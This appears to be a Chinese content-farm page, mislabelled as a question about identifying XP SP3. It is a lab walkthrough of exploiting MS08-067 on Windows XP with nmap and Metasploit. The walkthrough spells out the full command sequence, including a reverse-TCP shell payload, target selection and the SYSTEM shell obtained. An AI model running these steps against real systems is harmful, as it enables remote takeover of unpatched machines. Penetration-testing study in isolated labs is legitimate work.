您的位置 首页 > 数码极客

如何知道xp系统是sp3吗

ms08067漏洞的利用,是安全渗透测试比较常用的案例。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 但是由于自身知识的局限和疏忽,稍不留心就会失败。笔者尝试了几次才成功。

测试环境,建议虚拟机组建局域网,笔者用的是virtualbox。

靶机:Windows XP,桥接网卡,IP 192.168.0.107 系统版本:zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070 配置好局域网共享。

攻击主机: Kali Linux 2018-10-09,桥接网卡, IP 192.168.0.105 。

扫描一下目标主机

sudo nmap -sS -Pn -A 192.168.0.107

可以看出,已经探测出目标系统为XP sp2或者sp3.但是没有探测出语言版本。

默认在Kali Linux开启msfconsole需要先开启postgresql服务。

sudo service postgresql start msfconsole

在msf终端中,执行开启攻击。

搜索ms08_067模块,加载渗透攻击模块。

search ms08_067 use exploit/windows/smb/ms08_067_netapi

查看模块的参数,一些参数必须设置,比如RHOST(目标IP),RPORT(目标端口)等。

show options

set RHOST 192.168.0.107 set RPORT 445

该端口默认445,但是某些情况下,139端口更好用。

设置攻击载荷,并设置必备参数。

set payload windows/shell/reverse_tcp show options set LHOST 192.168.0.105

查看被影响的操作系统,默认是自动匹配。但是自动匹配不正确,会造成攻击失败。这是笔者的经验教训。

show targets set target 34 exploit

截图没有完整,安装的系统是XP sp3 简体中文版,编号是34.

攻击成功,就是上图的样子,返回一个 system32> 的shell。获取权限成功。

责任编辑: 鲁达

1.内容基于多重复合算法人工智能语言模型创作,旨在以深度学习研究为目的传播信息知识,内容观点与本网站无关,反馈举报请
2.仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证;
3.本站属于非营利性站点无毒无广告,请读者放心使用!

“如何知道xp系统是sp3吗”边界阅读